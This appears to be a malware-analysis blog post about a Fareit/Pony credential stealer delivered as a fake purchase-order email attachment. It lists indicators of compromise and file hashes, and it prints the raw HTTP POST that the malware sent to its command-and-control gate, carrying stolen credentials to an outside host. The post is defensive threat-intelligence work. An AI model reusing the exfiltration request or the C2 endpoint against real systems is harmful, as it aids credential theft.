2017-01-05 Fareit/Pony Malware from Malspam

Happy New Years to everyone! Hope that everyone had a great holiday break. For the first post of the year, here is an example of a Fareit/Pony (Suricata) or Phoenix/Zeus (Snort) trojan that I was able to find in the email filters. For more information about this malware please check out Fortinet’s post about it here. Like usual, the artifacts from this investigation can be found over in my Github repo here.

Indicator(s) of Compromise
=========================
62.108.34.152 / ssstpc.usa.cc (Port 80)

Artifacts from Investigation
=============================
File name: PURCHASE ORDER.gz
File size: 117KB
MD5 hash: 83e493c4330bf53196d1ebfc1c9631f3
Virustotal: http://www.virustotal.com/en/file/b42a61b173e07385bfe0ae34153b61538ec916484f1653144223d63dee8cfc4e/analysis/
Detection ratio: 14 / 56
First detected: 2017-01-05 09:09:07 UTC

File name: PURCHASE ORDER.exe
File size: 243KB
MD5 hash: 3d2a7f82b9590e1b5e55bf3b5bc8ee53
Virustotal: http://www.virustotal.com/en/file/4c7bb06f3887399d77ac6af9d67b32b7838170c635b5f85feca73b7d35c4d8a6/analysis/
Detection ratio: 15 / 56
First detected: 2017-01-05 09:00:51 UTC

File name: svhost.exe
File size: 52KB
MD5 hash: 278edbd499374bf73621f8c1f969d894
Virustotal: http://www.virustotal.com/en/file/c6999b9f79932c3b4f1c461a69d9dc8dc301d6a155abc33efe1b6e9e4a038391/analysis/
Detection ratio: 0 / 56
First detected: 2011-03-12 15:50:25 UTC

Analysis of Malware
====================
Once the user downloads, saves, and extracts the attachment from the email, they are left with a folder called “PURCHASE ORDER” with the “PURCHASE ORDER.exe” file inside. Once the user executes this binary, the binary unpacks what looks to be a valid “svchost.exe” in the C:\Users\%username%\AppData\Local\Temp folder and starts running that. After a minute or so, both the “PURCHASE ORDER.exe” and “svchost.exe” terminate and the system is returned to normal state. From the network side of things, we can see that there is a single call the malicious domain with a simple POST and no other traffic (and not other malicious files being downloaded/left on the system).

POST /ml/vrs/slyr/pny/panel/gate.php HTTP/1.0
Host: ssstpc.usa.cc
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 10735
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

HTTP/1.1 200 OK
Date: Thu, 05 Jan 2017 11:51:10 GMT
Server: Apache/2.2.31 (Unix)
X-Powered-By: PHP/5.5.38
Connection: close
Content-Type: text/html; charset=windows-1251

STATUS-IMPORT-OK

Looking at this a little closer with Process Monitor, I could see that the “svchost.exe” process was scanning the registry and file system looking for different software and certain files within those folders (ie: Filezilla in the screen shot below). Since this is along the Fareit/Zeus family of malware, it is obvious that it is looking for any saved credentials in application files or registry settings.

After it completes scanning the system, it closes the “svchost.exe” file and then performs the DNS query for the malicious domain to POST the data back as seen above from the PCAP.

At this point I was curious what things would look like if there was something saved on the system. So I wiped the VM and installed Filezilla Client and saved some dummy information in it and re-ran the malware. The results look about the same as you can see below.

POST /ml/vrs/slyr/pny/panel/gate.php HTTP/1.0
Host: ssstpc.usa.cc
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 19307
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

HTTP/1.1 200 OK
Date: Thu, 05 Jan 2017 13:17:37 GMT
Server: Apache/2.2.31 (Unix)
X-Powered-By: PHP/5.5.38
Connection: close
Content-Type: text/html; charset=windows-1251

STATUS-IMPORT-OK

The two things to notice here are 1) in the Process Montior output, the “svchost.exe” process is now able to read the Filezilla files where before it could not, and 2) the “Content-Length” in the second PCAP is larger than the initial one (10735 versus 19307).

Leave a Reply

Your email address will not be published. Required fields are marked *